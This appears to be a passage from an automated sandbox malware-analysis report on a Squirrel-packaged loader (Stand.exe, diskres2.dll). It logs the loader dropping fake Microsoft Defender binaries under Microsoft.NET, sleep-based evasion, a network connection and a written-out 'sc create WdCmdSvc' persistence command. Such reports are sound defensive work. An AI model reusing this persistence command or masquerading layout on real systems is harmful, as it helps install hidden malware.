          Source: Binary string: C:\Users\DeveloperSys\Desktop\Projetos C# para Loaders\Stand\obj\x64\Release\Stand.pdbIvan Medvedev source: Update.exe, 00000002.00000002.1700421994.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1700421994.00000000028B0000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: MpSvc.pdb source: MpSvc.dll.11.dr
          Source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: WKYC506_2389030007-00901003007010_777380775_#U00b2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: Stand.exe.2.drStatic PE information: 0xFEB0BDAA [Thu May 28 23:15:54 2105 UTC]
          Source: diskres2.dll.3.drStatic PE information: section name: .didata
          Source: MpCmdRun.exe.11.drStatic PE information: section name: .didat
          Source: MpCommu.dll.11.drStatic PE information: section name: .didat
          Source: MpRtp.dll.11.drStatic PE information: section name: .didat
          Source: MpSvc.dll.11.drStatic PE information: section name: .didat
          Source: NisSrv.exe.11.drStatic PE information: section name: .didat
          Source: ProtectionManagement.dll.11.drStatic PE information: section name: .didat
          Source: MpCmdRun.exe0.11.drStatic PE information: section name: .didat
          Source: MpClient.dll.11.drStatic PE information: section name: _RDATA
          Source: MpCmdRun.dll.11.drStatic PE information: section name: .didata
          Source: Stand.exe.2.drStatic PE information: section name: .text entropy: 7.877831282353793
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\SquirrelTemp\Squirrel-Install.logJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ExtraJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Extra\Stand.lnkJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043BAC70 IsIconic,7_2_043BAC70
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_043BACF4 GetWindowLongW,IsIconic,IsWindowVisible,ShowWindow,SetWindowLongW,SetWindowLongW,ShowWindow,ShowWindow,7_2_043BACF4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0480ACF4 GetWindowLongW,IsIconic,IsWindowVisible,ShowWindow,SetWindowLongW,SetWindowLongW,ShowWindow,ShowWindow,11_2_0480ACF4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0480AC70 IsIconic,11_2_0480AC70
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          Source: C:\Windows\SysWOW64\rundll32.exeStalling execution: Execution stalls by calling Sleepgraph_11-12929
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeWindow / User API: threadDelayed 1871Jump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeWindow / User API: threadDelayed 1519Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\pt-BR\EppManifest.dll.muiJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpRtp.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exeJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\RedistList\OfflineScannerShell.exeJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\RedistList\EppManifest.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\en-US\OfflineScannerShell.exe.muiJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\EppManifest.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\endpointdlp.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\ProtectionManagement.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\en-US\shellext.dll.muiJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpCmdRun.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\en-US\MpAsDesc.dll.muiJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpAzSubmit.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\pt-BR\MpAsDesc.dll.muiJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\RedistList\MsMpLics.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpDetoursCopyAccelerator.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\en-US\MpEvMsg.dll.muiJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpOAV.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\pt-BR\shellext.dll.muiJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpDlpCmd.exeJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpEvMsg.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpDetours.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\en-US\EppManifest.dll.muiJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\pt-BR\MpEvMsg.dll.muiJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpSvc.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpProvider.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpCommu.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MsMpLics.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpCopyAccelerator.exeJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\pt-BR\ProtectionManagement.dll.muiJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\RedistList\MpCmdRun.exeJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\en-US\ProtectionManagement.dll.muiJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\DefenderCSP.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Extra\app-1.0.0\diskres2.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpAsDesc.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MsMpCom.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MsMpEng.exeJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpClient.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\pt-BR\OfflineScannerShell.exe.muiJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\ConfigSecurityPolicy.exeJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\shellext.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\NisSrv.exeJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\AMMonitoringProvider.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe TID: 5768Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe TID: 3808Thread sleep count: 1871 > 30Jump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe TID: 5744Thread sleep count: 1519 > 30Jump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe TID: 6548Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exe TID: 4916Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\svchost.exe TID: 6676Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041ED3E4 FindFirstFileW,FindClose,7_2_041ED3E4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041ECE18 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,7_2_041ECE18
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0463D3E4 FindFirstFileW,FindClose,11_2_0463D3E4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04654D5C FindFirstFileW,FindClose,11_2_04654D5C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0463CE18 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,11_2_0463CE18
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04652D1C GetLogicalDriveStringsW,QueryDosDeviceW,11_2_04652D1C
          Source: C:\Users\user\Desktop\WKYC506_2389030007-00901003007010_777380775_#U00b2.exeCode function: 0_2_002B9ED6 VirtualQuery,GetSystemInfo,0_2_002B9ED6
          Source: svchost.exe, 00000004.00000002.3305962459.0000020471A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3306491284.0000020476E57000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3505654355.0000000002E16000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3505654355.0000000002DBD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_7-9462
          Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_11-13877
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 52.95.163.114 443
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0484A074 ShellExecuteW,11_2_0484A074
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Process created: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exe "C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exe" --squirrel-firstrun
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" "C:\Users\user\AppData\Local\Extra\app-1.0.0\diskres2.dll" Tower2
          Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\sc.exe sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto
          Source: rundll32.exe, 00000007.00000002.3506614439.00000000046A1000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Program Managerw
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_041E7B44 cpuid 7_2_041E7B44
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetUserDefaultUILanguage,GetLocaleInfoW,7_2_041ED51C
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,7_2_041EC9BC
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetUserDefaultUILanguage,GetLocaleInfoW,11_2_0463D51C
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,11_2_0463C9BC
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Queries volume information: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe VolumeInformation
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ComponentModel.DataAnnotations\v4.0_4.0.0.0__31bf3856ad364e35\System.ComponentModel.DataAnnotations.dll VolumeInformation
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework-SystemXml\v4.0_4.0.0.0__b77a5c561934e089\PresentationFramework-SystemXml.dll VolumeInformation
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationTypes\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationTypes.dll VolumeInformation
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationProvider\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationProvider.dll VolumeInformation
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exe Queries volume information: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exe VolumeInformation
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Extra\app-1.0.0\Stand.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
